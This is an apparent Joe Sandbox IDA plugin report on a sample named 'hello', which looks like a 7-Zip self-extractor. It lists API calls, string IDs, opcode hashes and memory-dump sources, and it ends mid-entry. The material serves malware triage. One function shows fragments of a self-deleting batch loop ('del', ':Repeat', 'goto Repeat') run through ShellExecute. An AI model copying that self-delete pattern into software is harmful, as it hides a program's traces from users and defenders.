                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                        • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                        • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                        • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                        • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                        • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                        • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                        • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                        • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                        • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                        • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                        • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                        • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                        APIs
                                        • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                        • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                        • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                        • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                        • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                        • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                        • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                        • API String ID: 3007203151-3467708659
                                        • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                        • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                        • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                        • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                        APIs
                                        • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                          • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                          • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                          • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                          • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                          • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                          • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                        • _wtol.MSVCRT ref: 004047DC
                                        • _wtol.MSVCRT ref: 004047F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                        • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                        • API String ID: 2725485552-3187639848
                                        • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                        • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                        • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                        • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                        APIs
                                        • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                        • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                          • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                          • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                        • GetParent.USER32(?), ref: 00402E2E
                                        • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                        • GetMenu.USER32(?), ref: 00402E55
                                        • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                        • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                        • DestroyWindow.USER32(?), ref: 00402EA3
                                        • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                        • GetSysColor.USER32(0000000F), ref: 00402EBC
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                        • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                        • String ID: RichEdit20W$STATIC$riched20${\rtf
                                        • API String ID: 1731037045-2281146334
                                        • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                        • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                        • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                        • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                        APIs
                                        • GetWindowDC.USER32(00000000), ref: 00401CD4
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                        • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                        • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                        • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                        • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                        • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                        • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                        • SelectObject.GDI32(00000000,?), ref: 00401D60
                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                        • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                        • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                        • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                        • DeleteDC.GDI32(00000000), ref: 00401DC2
                                        • DeleteDC.GDI32(00000000), ref: 00401DC5
                                        • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                        • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                        • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                        • String ID:
                                        • API String ID: 3462224810-0
                                        • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                        • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                        • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                        • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                        APIs
                                        • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                        • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                        • GetMenu.USER32(?), ref: 00401E44
                                          • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                          • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                          • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                          • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                          • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                          • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                        • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                        • CoInitialize.OLE32(00000000), ref: 00401E8C
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                        • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                          • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                          • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                          • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                          • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                          • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                          • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                          • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                          • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                          • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                          • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                          • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                          • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                          • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                          • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                          • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                        • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                        • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                        • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                        • String ID: IMAGES$STATIC
                                        • API String ID: 4202116410-1168396491
                                        • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                        • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                        • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                        • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                        APIs
                                          • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                          • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                        • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                        • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                        • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                        • SetWindowLongW.USER32(00000000), ref: 004081D8
                                        • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                        • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                        • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                        • SetFocus.USER32(00000000), ref: 0040821D
                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                        • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                        • GetDlgItem.USER32(?,00000002), ref: 00408294
                                        • IsWindow.USER32(00000000), ref: 00408297
                                        • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                        • EnableWindow.USER32(00000000), ref: 004082AA
                                        • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                        • ShowWindow.USER32(00000000), ref: 004082C1
                                          • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                          • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                          • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                          • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                          • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                          • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                          • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                          • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                        • String ID:
                                        • API String ID: 855516470-0
                                        • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                        • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                        • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                        • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                        • strncmp.MSVCRT ref: 004031F1
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                        • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                        • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$lstrcmpstrncmp
                                        • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                        • API String ID: 2881732429-172299233
                                        • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                        • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                        • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                        • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                        APIs
                                        • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                        • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                        • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                        • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                        • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                        • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                        • GetParent.USER32(?), ref: 00406B43
                                        • GetClientRect.USER32(00000000,?), ref: 00406B55
                                        • ClientToScreen.USER32(?,?), ref: 00406B68
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                        • GetClientRect.USER32(?,?), ref: 00406C55
                                        • ClientToScreen.USER32(?,?), ref: 00406B71
                                          • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                        • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                        • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                          • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                          • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
